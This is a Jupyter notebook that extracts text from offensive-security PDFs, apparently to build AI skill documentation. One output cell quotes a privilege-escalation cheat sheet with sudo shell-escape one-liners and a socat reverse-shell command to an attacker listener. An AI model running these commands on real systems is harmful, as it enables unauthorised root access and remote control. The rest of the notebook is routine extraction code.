# PDF Analysis for SKILLS.md Documentation

This notebook extracts and analyzes content from security-focused PDF files to create structured documentation for Claude AI SKILLS.md files.

In [12]:
# Import Required Libraries
import fitz  # PyMuPDF
import os
import json
from pathlib import Path

# Define base path for PDF files
PDF_DIR = "/workspaces/SecOps-CLI-Guides/files"

# List of PDFs to analyze
PDF_FILES = [
    "40 Methods for Privilege Escalation.pdf",
    "APIs Fuzzing for Bug Bounty.pdf",
    "AWS Pentest.pdf",
    "Active Directory Attacks.pdf",
    "All-About-Hacking.pdf",
    "Attacking Active Directory (AD) from Kali Linux.pdf",
    "BGP_Routing_Protocol.pdf",
    "Buffer Overflow.pdf",
    "Build A Malicious Lab.pdf",
    "Burp Suite User Manual.pdf"
]

print("Libraries imported successfully!")

Libraries imported successfully!


In [13]:
def extract_pdf_text(pdf_path, max_pages=50):
    """Extract text from PDF file"""
    try:
        doc = fitz.open(pdf_path)
        text_content = []
        total_pages = len(doc)
        pages_to_read = min(max_pages, total_pages)
        
        for page_num in range(pages_to_read):
            page = doc[page_num]
            text_content.append(page.get_text())
        
        doc.close()
        return {
            "total_pages": total_pages,
            "pages_read": pages_to_read,
            "text": "\n".join(text_content)
        }
    except Exception as e:
        return {"error": str(e)}

def analyze_pdf(pdf_name):
    """Analyze a single PDF and extract key information"""
    pdf_path = os.path.join(PDF_DIR, pdf_name)
    result = extract_pdf_text(pdf_path)
    
    if "error" in result:
        return {"name": pdf_name, "error": result["error"]}
    
    text = result["text"]
    
    return {
        "name": pdf_name,
        "total_pages": result["total_pages"],
        "text_preview": text[:5000] if len(text) > 5000 else text,
        "full_text": text
    }

print("Analysis functions defined!")

Analysis functions defined!


In [3]:
# Analyze PDF 1: 40 Methods for Privilege Escalation
pdf1 = analyze_pdf("40 Methods for Privilege Escalation.pdf")
print(f"=== {pdf1['name']} ===")
print(f"Total Pages: {pdf1.get('total_pages', 'N/A')}")
print("\n--- Content Preview ---")
print(pdf1.get('text_preview', pdf1.get('error', 'No content')))

=== 40 Methods for Privilege Escalation.pdf ===
Total Pages: 186

--- Content Preview ---
40 METHODS FOR PRIVILEGE
ESCALATION
PART 1
HADESS | SECURE AGILE DEVELOPMENT
WWW.HADESS.IO

Domain: No
Local Admin: Yes
​
OS: Linux
Type:  Abusing Privileged Files
sudo vim -c ':!/bin/bash'
sudo find / etc/passwd -exec /bin/bash \;
echo "os.execute('/bin/bash/')" > /tmp/shell.nse && sudo nmap --
script=/tmp/shell.nse
sudo env /bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo perl -e 'exec "/bin/bash";'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo less /etc/hosts - !bash
sudo man man - !bash
sudo ftp - ! /bin/bash
Attacker = socat file:`tty`,raw,echo=0 tcp-listen:1234
Victim 
= 
sudo 
socat 
exec:'sh 
-li',pty,stderr,setsid,sigint,sane
tcp:192.168.1.105:1234
echo test > notes.txt
sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash"
sudo gcc -wrapper /bin/bash,-s .
ABUSING SUDO BINARIES
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT Used
Detection

Domain: Y/N
Local Admi

In [4]:
# Extract all PDFs and save to file for analysis
all_results = {}

for pdf_name in PDF_FILES:
    print(f"Processing: {pdf_name}...")
    result = analyze_pdf(pdf_name)
    all_results[pdf_name] = result
    print(f"  Pages: {result.get('total_pages', 'N/A')}")
    print(f"  Content length: {len(result.get('full_text', ''))}")

print("\n=== All PDFs processed! ===")

Processing: 40 Methods for Privilege Escalation.pdf...
  Pages: 186
  Content length: 19220
Processing: APIs Fuzzing for Bug Bounty.pdf...
  Pages: 7
  Content length: 10747
Processing: AWS Pentest.pdf...
  Pages: 55
  Content length: 57367
Processing: Active Directory Attacks.pdf...
  Pages: 102
  Content length: 69987
Processing: All-About-Hacking.pdf...
  Pages: 238
  Content length: 58837
Processing: Attacking Active Directory (AD) from Kali Linux.pdf...
  Pages: 28
  Content length: 25477
Processing: BGP_Routing_Protocol.pdf...
  Pages: 155
  Content length: 97746
Processing: Buffer Overflow.pdf...
  Pages: 44
  Content length: 33118
Processing: Build A Malicious Lab.pdf...
  Pages: 12
  Content length: 17481
Processing: Burp Suite User Manual.pdf...
  Pages: 23
  Content length: 19424

=== All PDFs processed! ===


In [5]:
# Save extracted content to text files for review
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for pdf_name, data in all_results.items():
    filename = pdf_name.replace(".pdf", ".txt").replace(" ", "_")
    filepath = os.path.join(output_dir, filename)
    with open(filepath, "w") as f:
        f.write(f"=== {pdf_name} ===\n")
        f.write(f"Total Pages: {data.get('total_pages', 'N/A')}\n")
        f.write("=" * 60 + "\n\n")
        f.write(data.get("full_text", data.get("error", "No content")))
    print(f"Saved: {filename}")

print("\nAll content saved to /workspaces/SecOps-CLI-Guides/extracted/")

Saved: 40_Methods_for_Privilege_Escalation.txt
Saved: APIs_Fuzzing_for_Bug_Bounty.txt
Saved: AWS_Pentest.txt
Saved: Active_Directory_Attacks.txt
Saved: All-About-Hacking.txt
Saved: Attacking_Active_Directory_(AD)_from_Kali_Linux.txt
Saved: BGP_Routing_Protocol.txt
Saved: Buffer_Overflow.txt
Saved: Build_A_Malicious_Lab.txt
Saved: Burp_Suite_User_Manual.txt

All content saved to /workspaces/SecOps-CLI-Guides/extracted/


In [6]:
# Batch 2 PDF Analysis - Extract and analyze 10 PDF files
import fitz
import os

def extract_pdf_text(pdf_path, max_pages=50):
    """Extract text from PDF file"""
    try:
        doc = fitz.open(pdf_path)
        text = []
        total_pages = len(doc)
        pages_to_read = min(max_pages, total_pages)
        
        for page_num in range(pages_to_read):
            page = doc[page_num]
            page_text = page.get_text()
            if page_text.strip():
                text.append(page_text)
        
        doc.close()
        return {
            "total_pages": total_pages,
            "pages_read": pages_to_read,
            "content": "\n".join(text)
        }
    except Exception as e:
        return {"error": str(e)}

# Batch 2 files
batch2_files = [
    "Burp_Suite.pdf",
    "CSRF Notes.pdf",
    "Cloud Pentest Cheat sheet.pdf",
    "Cross_site_Scripting_and_HTML_Injection.pdf",
    "DDoS_Attack.pdf",
    "Enumeration Checklist For OSCP Exam.pdf",
    "Ethical Hacking By Joe Grant.pdf",
    "External Network Penetration Testing.pdf",
    "File_Path_Traversal.pdf",
    "HTML Injection.pdf"
]

PDF_DIR = "/workspaces/SecOps-CLI-Guides/files"
batch2_results = {}

for filename in batch2_files:
    filepath = os.path.join(PDF_DIR, filename)
    if os.path.exists(filepath):
        print(f"Extracting: {filename}")
        batch2_results[filename] = extract_pdf_text(filepath)
        print(f"  - Pages: {batch2_results[filename].get('total_pages', 'N/A')}")
    else:
        print(f"NOT FOUND: {filename}")
        batch2_results[filename] = {"error": "File not found"}

print(f"\nExtracted {len([r for r in batch2_results.values() if 'content' in r])} PDFs successfully")

Extracting: Burp_Suite.pdf
  - Pages: 23
Extracting: CSRF Notes.pdf
  - Pages: 7
Extracting: Cloud Pentest Cheat sheet.pdf
  - Pages: 31
Extracting: Cross_site_Scripting_and_HTML_Injection.pdf
  - Pages: 17
Extracting: DDoS_Attack.pdf
  - Pages: 31
Extracting: Enumeration Checklist For OSCP Exam.pdf
  - Pages: 1
Extracting: Ethical Hacking By Joe Grant.pdf
  - Pages: 112
Extracting: External Network Penetration Testing.pdf
  - Pages: 10
Extracting: File_Path_Traversal.pdf
  - Pages: 20
Extracting: HTML Injection.pdf
  - Pages: 10

Extracted 10 PDFs successfully


In [7]:
# PDF 1: Burp_Suite.pdf - Display content
content = batch2_results["Burp_Suite.pdf"]["content"]
print(f"=== Burp_Suite.pdf ({batch2_results['Burp_Suite.pdf']['total_pages']} pages) ===\n")
print(content[:15000])

=== Burp_Suite.pdf (23 pages) ===

1 
 
 
 
 
BURPSUITE 

2 
 
 
Table of Contents 
Table of Contents ............................................................................................................... 2 
1. Burp Suite Overview ...................................................................................................... 4 
1.1. 
What is Burp Suite? ........................................................................................... 4 
1.2. 
Editions of Burp Suite ....................................................................................... 4 
1.3. 
Use Cases ........................................................................................................... 4 
1.4. 
Download and Installation Steps ....................................................................... 5 
2. 
Intercept HTTP traffic with Burp Proxy ............................................................ 5 
2.1. 
Launch Burp's browser ......................................

In [8]:
# Save all Batch 2 extractions to text files
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for filename, data in batch2_results.items():
    if "content" in data:
        safe_name = filename.replace(" ", "_").replace(".pdf", ".txt")
        output_path = os.path.join(output_dir, safe_name)
        with open(output_path, "w") as f:
            f.write(f"=== {filename} ===\n")
            f.write(f"Total Pages: {data['total_pages']}\n")
            f.write("=" * 60 + "\n\n")
            f.write(data["content"])
        print(f"Saved: {safe_name}")

print("\nAll files saved to extracted/ directory")

Saved: Burp_Suite.txt
Saved: CSRF_Notes.txt
Saved: Cloud_Pentest_Cheat_sheet.txt
Saved: Cross_site_Scripting_and_HTML_Injection.txt
Saved: DDoS_Attack.txt
Saved: Enumeration_Checklist_For_OSCP_Exam.txt
Saved: Ethical_Hacking_By_Joe_Grant.txt
Saved: External_Network_Penetration_Testing.txt
Saved: File_Path_Traversal.txt
Saved: HTML_Injection.txt

All files saved to extracted/ directory


## Batch 3 PDF Analysis

Extracting and analyzing 10 additional PDF files:
1. Introduction to IDOR.pdf
2. JSON_Web_Token_Hacking.pdf
3. John_the_Ripper.pdf
4. LDAP_Injection.pdf
5. LINUX PRIVILEGE ESCALATION.pdf
6. Linux Commands.pdf
7. Linux Production Shell Scripts.pdf
8. Linux_Pentest.pdf
9. Metasploit.pdf
10. Mobile Security Testing Guide.pdf

In [9]:
# Batch 3 PDF Analysis - Extract and analyze 10 PDF files
import fitz
import os

def extract_pdf_text(pdf_path, max_pages=50):
    """Extract text from PDF file"""
    try:
        doc = fitz.open(pdf_path)
        text = []
        total_pages = len(doc)
        pages_to_read = min(max_pages, total_pages)
        
        for page_num in range(pages_to_read):
            page = doc[page_num]
            page_text = page.get_text()
            if page_text.strip():
                text.append(page_text)
        
        doc.close()
        return {
            "total_pages": total_pages,
            "pages_read": pages_to_read,
            "content": "\n".join(text)
        }
    except Exception as e:
        return {"error": str(e)}

# Batch 3 files
batch3_files = [
    "Introduction to IDOR.pdf",
    "JSON_Web_Token_Hacking.pdf",
    "John_the_Ripper.pdf",
    "LDAP_Injection.pdf",
    "LINUX PRIVILEGE ESCALATION.pdf",
    "Linux Commands.pdf",
    "Linux Production Shell Scripts.pdf",
    "Linux_Pentest.pdf",
    "Metasploit.pdf",
    "Mobile Security Testing Guide.pdf"
]

PDF_DIR = "/workspaces/SecOps-CLI-Guides/files"
batch3_results = {}

for filename in batch3_files:
    filepath = os.path.join(PDF_DIR, filename)
    if os.path.exists(filepath):
        print(f"Extracting: {filename}")
        batch3_results[filename] = extract_pdf_text(filepath)
        print(f"  - Pages: {batch3_results[filename].get('total_pages', 'N/A')}")
    else:
        print(f"NOT FOUND: {filename}")
        batch3_results[filename] = {"error": "File not found"}

print(f"\nExtracted {len([r for r in batch3_results.values() if 'content' in r])} PDFs successfully")

Extracting: Introduction to IDOR.pdf
  - Pages: 41
Extracting: JSON_Web_Token_Hacking.pdf
  - Pages: 13
Extracting: John_the_Ripper.pdf
  - Pages: 33
Extracting: LDAP_Injection.pdf
  - Pages: 18
Extracting: LINUX PRIVILEGE ESCALATION.pdf
  - Pages: 42
Extracting: Linux Commands.pdf
  - Pages: 31
Extracting: Linux Production Shell Scripts.pdf
  - Pages: 10
Extracting: Linux_Pentest.pdf
  - Pages: 48
Extracting: Metasploit.pdf
  - Pages: 6
Extracting: Mobile Security Testing Guide.pdf
  - Pages: 110

Extracted 10 PDFs successfully


In [10]:
# Save all Batch 3 extractions to text files
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for filename, data in batch3_results.items():
    if "content" in data:
        safe_name = filename.replace(" ", "_").replace(".pdf", ".txt")
        output_path = os.path.join(output_dir, safe_name)
        with open(output_path, "w") as f:
            f.write(f"=== {filename} ===\n")
            f.write(f"Total Pages: {data['total_pages']}\n")
            f.write("=" * 60 + "\n\n")
            f.write(data["content"])
        print(f"Saved: {safe_name}")

print("\nAll Batch 3 files saved to extracted/ directory")

Saved: Introduction_to_IDOR.txt
Saved: JSON_Web_Token_Hacking.txt
Saved: John_the_Ripper.txt
Saved: LDAP_Injection.txt
Saved: LINUX_PRIVILEGE_ESCALATION.txt
Saved: Linux_Commands.txt
Saved: Linux_Production_Shell_Scripts.txt
Saved: Linux_Pentest.txt
Saved: Metasploit.txt
Saved: Mobile_Security_Testing_Guide.txt

All Batch 3 files saved to extracted/ directory


## Batch 4: Network & Pentesting Methodology PDFs

Analyzing 10 PDFs focused on networking fundamentals, OSCP preparation, and pentesting methodology.

In [14]:
# Batch 4: Network & Pentesting Methodology PDFs
batch4_files = [
    "Network Ports List.pdf",
    "Network_101.pdf",
    "Networking-Essantials.pdf",
    "Notes and Tools for Red Teamers.pdf",
    "OSCP Cheat Sheet.pdf",
    "OSCP Notes.pdf",
    "Pentest_Check_List.pdf",
    "Pentest_Commands.pdf",
    "Pentesting_from_Beginner_to_Advance.pdf",
    "Phishing Attack Pentest Guide.pdf"
]

batch4_results = {}
for pdf in batch4_files:
    print(f"Analyzing: {pdf}")
    batch4_results[pdf] = analyze_pdf(pdf)
    print(f"  Pages: {batch4_results[pdf].get('total_pages', 'N/A')}")

print(f"\nBatch 4: Analyzed {len(batch4_results)} PDFs")

Analyzing: Network Ports List.pdf
  Pages: 21
Analyzing: Network_101.pdf
  Pages: 43
Analyzing: Networking-Essantials.pdf
  Pages: 33
Analyzing: Notes and Tools for Red Teamers.pdf
  Pages: 23
Analyzing: OSCP Cheat Sheet.pdf
  Pages: 36
Analyzing: OSCP Notes.pdf
  Pages: 78
Analyzing: Pentest_Check_List.pdf
  Pages: 17
Analyzing: Pentest_Commands.pdf
  Pages: 22
Analyzing: Pentesting_from_Beginner_to_Advance.pdf
  Pages: 21
Analyzing: Phishing Attack Pentest Guide.pdf
  Pages: 24

Batch 4: Analyzed 10 PDFs


In [15]:
# Display content from each Batch 4 PDF
for pdf_name, data in batch4_results.items():
    print("=" * 80)
    print(f"PDF: {pdf_name}")
    print(f"Total Pages: {data.get('total_pages', 'N/A')}")
    print("-" * 80)
    if 'error' in data:
        print(f"ERROR: {data['error']}")
    else:
        # Show extended preview for analysis
        text = data.get('full_text', data.get('text_preview', ''))
        print(text[:12000])  # Extended preview
    print("\n")

PDF: Network Ports List.pdf
Total Pages: 21
--------------------------------------------------------------------------------
 
Intelop Corporation 
 
Intelop Corporation 
 
 
 
 
 
 
intelop
intelop
 
 
 
Detailed List of Common Protocols  
 
& traditional  
 
  IP Port Numbers 
 
 
 
 
 
 
(Dr. A Rehman, Intelop Corporation) 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

 
Intelop Corporation 
 
Intelop Corporation 
 
Port 
Protocol 
0 
reserved. 
1 
TCPMUX, TCP Port Service Multiplexer. 
2 
Management Utility. 
3 
Compression Process. 
4 
  
5 
Remote Job Entry. 
6 
  
7 
Echo. 
8 
  
9 
Discard. 
10 
  
11 
SYSTAT. 
12 
  
13 
Daytime. 
14 
  
15 
[was netstat]. 
16 
  
17 
Quote, Quote of the Day. 
18 
RWP, Remote Write Protocol. 
Send, Message Send Protocol. 
19 
Chargen, Character Generator Protocol. 
20 
FTP, File Transfer Protocol, data. 
21 
FTP, File Transfer Protocol, control. 
22 
SSH. 
23 
Telnet. 
24 
Any private mail system. 
25 
SMTP, Simple Mail Transfer Protocol. 
26 
  
27 
NSW U

In [16]:
# PDF 1: Network Ports List
pdf = batch4_results["Network Ports List.pdf"]
print(f"=== {pdf['name']} ({pdf['total_pages']} pages) ===\n")
print(pdf['full_text'][:15000])

=== Network Ports List.pdf (21 pages) ===

 
Intelop Corporation 
 
Intelop Corporation 
 
 
 
 
 
 
intelop
intelop
 
 
 
Detailed List of Common Protocols  
 
& traditional  
 
  IP Port Numbers 
 
 
 
 
 
 
(Dr. A Rehman, Intelop Corporation) 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

 
Intelop Corporation 
 
Intelop Corporation 
 
Port 
Protocol 
0 
reserved. 
1 
TCPMUX, TCP Port Service Multiplexer. 
2 
Management Utility. 
3 
Compression Process. 
4 
  
5 
Remote Job Entry. 
6 
  
7 
Echo. 
8 
  
9 
Discard. 
10 
  
11 
SYSTAT. 
12 
  
13 
Daytime. 
14 
  
15 
[was netstat]. 
16 
  
17 
Quote, Quote of the Day. 
18 
RWP, Remote Write Protocol. 
Send, Message Send Protocol. 
19 
Chargen, Character Generator Protocol. 
20 
FTP, File Transfer Protocol, data. 
21 
FTP, File Transfer Protocol, control. 
22 
SSH. 
23 
Telnet. 
24 
Any private mail system. 
25 
SMTP, Simple Mail Transfer Protocol. 
26 
  
27 
NSW User System FE. 
28 
  
29 
MSG ICP. 
30 
  
31 
MSG Authentication. 
32 
  
33 
Di

In [17]:
# Save all Batch 4 extractions to text files
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for pdf_name, data in batch4_results.items():
    if 'error' not in data:
        safe_name = pdf_name.replace('.pdf', '.txt').replace(' ', '_')
        output_path = os.path.join(output_dir, safe_name)
        with open(output_path, 'w', encoding='utf-8') as f:
            f.write(data.get('full_text', ''))
        print(f"Saved: {safe_name}")

print(f"\nAll Batch 4 files saved to {output_dir}")

Saved: Network_Ports_List.txt
Saved: Network_101.txt
Saved: Networking-Essantials.txt
Saved: Notes_and_Tools_for_Red_Teamers.txt
Saved: OSCP_Cheat_Sheet.txt
Saved: OSCP_Notes.txt
Saved: Pentest_Check_List.txt
Saved: Pentest_Commands.txt
Saved: Pentesting_from_Beginner_to_Advance.txt
Saved: Phishing_Attack_Pentest_Guide.txt

All Batch 4 files saved to /workspaces/SecOps-CLI-Guides/extracted


## Batch 5: PowerShell, SQL Injection & SSH Security PDFs

In [18]:
# Batch 5: PowerShell, SQL Injection & SSH Security PDFs
batch5_files = [
    "PowerShell_Scripting_Fundamentals.pdf",
    "Quick Pentest Guide.pdf",
    "SMTP Pentest.pdf",
    "SQL Injection.pdf",
    "SQLMap_Database_Pentesting.pdf",
    "SQLi.pdf",
    "SSH Access Through Keys.pdf",
    "SSH_Pentesting.pdf",
    "Scanning Tools.pdf",
    "Session Fixation and Hijacking.pdf"
]

batch5_results = {}
for pdf in batch5_files:
    print(f"Analyzing: {pdf}")
    batch5_results[pdf] = analyze_pdf(pdf)
    print(f"  Pages: {batch5_results[pdf].get('total_pages', 'N/A')}")

print(f"\nBatch 5: Analyzed {len(batch5_results)} PDFs")

Analyzing: PowerShell_Scripting_Fundamentals.pdf
  Pages: 31
Analyzing: Quick Pentest Guide.pdf
  Pages: 17
Analyzing: SMTP Pentest.pdf
  Pages: 21
Analyzing: SQL Injection.pdf
  Pages: 21
Analyzing: SQLMap_Database_Pentesting.pdf
  Pages: 25
Analyzing: SQLi.pdf
  Pages: 10
Analyzing: SSH Access Through Keys.pdf
  Pages: 6
Analyzing: SSH_Pentesting.pdf
  Pages: 3
Analyzing: Scanning Tools.pdf
  Pages: 8
Analyzing: Session Fixation and Hijacking.pdf
  Pages: 11

Batch 5: Analyzed 10 PDFs


In [19]:
# PDF 1: PowerShell_Scripting_Fundamentals.pdf
pdf = batch5_results["PowerShell_Scripting_Fundamentals.pdf"]
print(f"=== {pdf['name']} ({pdf['total_pages']} pages) ===\n")
print(pdf['full_text'][:20000])

=== PowerShell_Scripting_Fundamentals.pdf (31 pages) ===

PowerShell Scripting Fundamentals
1
PowerShell Scripting Fundamentals
PowerShell Variables and Scopes
Variables
A variable is a named storage location in a computer's memory that holds a value that can change.
📢The $ sign at the beginning indicates a variable.
$i = 1
$string = "Hello World!"
$this_is_a_variable = "test"
💡Variables are for storing simple values, strings, and also the output of commands.
$date = Get-Date
Write-Host "Today is" $date
Data Types
PowerShell automatically assigns a data type to a variable based on the type that best suits its 
content.
Using Get-Type  command to find out the data type of a variable:
$x = 4
$string = "Hello World!"
$date = Get-Date
$x.GetType().Name
$string.GetType().Name
$date.GetType().Name

PowerShell Scripting Fundamentals
2
Overview of data types
[string]
[char]
[byte]
[int], [int32]
[long]
[bool]
[decimal]
[single],[float]
[double]
[datetime]
[array]
[hashtable]
[guid]
[psobject],

In [20]:
# Save all Batch 5 extractions to text files
output_dir = "/workspaces/SecOps-CLI-Guides/extracted"
os.makedirs(output_dir, exist_ok=True)

for pdf_name, data in batch5_results.items():
    if 'error' not in data:
        safe_name = pdf_name.replace('.pdf', '.txt').replace(' ', '_')
        output_path = os.path.join(output_dir, safe_name)
        with open(output_path, 'w', encoding='utf-8') as f:
            f.write(data.get('full_text', ''))
        print(f"Saved: {safe_name}")

print(f"\nAll Batch 5 files saved to {output_dir}")

Saved: PowerShell_Scripting_Fundamentals.txt
Saved: Quick_Pentest_Guide.txt
Saved: SMTP_Pentest.txt
Saved: SQL_Injection.txt
Saved: SQLMap_Database_Pentesting.txt
Saved: SQLi.txt
Saved: SSH_Access_Through_Keys.txt
Saved: SSH_Pentesting.txt
Saved: Scanning_Tools.txt
Saved: Session_Fixation_and_Hijacking.txt

All Batch 5 files saved to /workspaces/SecOps-CLI-Guides/extracted


## Batch 6 - Final Remaining Files

In [21]:
# Batch 6 - Final set of PDFs
batch6_files = [
    "Shodan Pentesting Guide.pdf",
    "Top Web Vulnerabilities.pdf",
    "WI-FI Hacking Notes.pdf",
    "Windows Privilege Escalation Secrets.pdf",
    "Windows Privilege Escalation.pdf",
    "Wireshark.pdf",
    "WordPress_Pentesting.pdf",
    "XSS with Examples.pdf",
    "broken authentication.pdf"
]

batch6_results = {}
for pdf_name in batch6_files:
    filepath = os.path.join(PDF_DIR, pdf_name)
    if os.path.exists(filepath):
        result = extract_pdf_text(filepath, max_pages=40)
        batch6_results[pdf_name] = result
        print(f"✓ Extracted: {pdf_name} ({result['total_pages']} pages)")
    else:
        print(f"✗ Not found: {pdf_name}")

print(f"\nTotal extracted: {len(batch6_results)} PDFs")

✓ Extracted: Shodan Pentesting Guide.pdf (80 pages)
✓ Extracted: Top Web Vulnerabilities.pdf (33 pages)
✓ Extracted: WI-FI Hacking Notes.pdf (13 pages)
✓ Extracted: Windows Privilege Escalation Secrets.pdf (34 pages)
✓ Extracted: Windows Privilege Escalation.pdf (26 pages)
✓ Extracted: Wireshark.pdf (6 pages)
✓ Extracted: WordPress_Pentesting.pdf (44 pages)
✓ Extracted: XSS with Examples.pdf (22 pages)
✓ Extracted: broken authentication.pdf (12 pages)

Total extracted: 9 PDFs


In [24]:
# Save Batch 6 extractions to text files for analysis
for pdf_name, data in batch6_results.items():
    safe_name = pdf_name.replace(".pdf", ".txt").replace(" ", "_")
    output_path = os.path.join(output_dir, safe_name)
    with open(output_path, 'w') as f:
        f.write(data["text"])
    print(f"Saved: {safe_name}")

Saved: Shodan_Pentesting_Guide.txt
Saved: Top_Web_Vulnerabilities.txt
Saved: WI-FI_Hacking_Notes.txt
Saved: Windows_Privilege_Escalation_Secrets.txt
Saved: Windows_Privilege_Escalation.txt
Saved: Wireshark.txt
Saved: WordPress_Pentesting.txt
Saved: XSS_with_Examples.txt
Saved: broken_authentication.txt
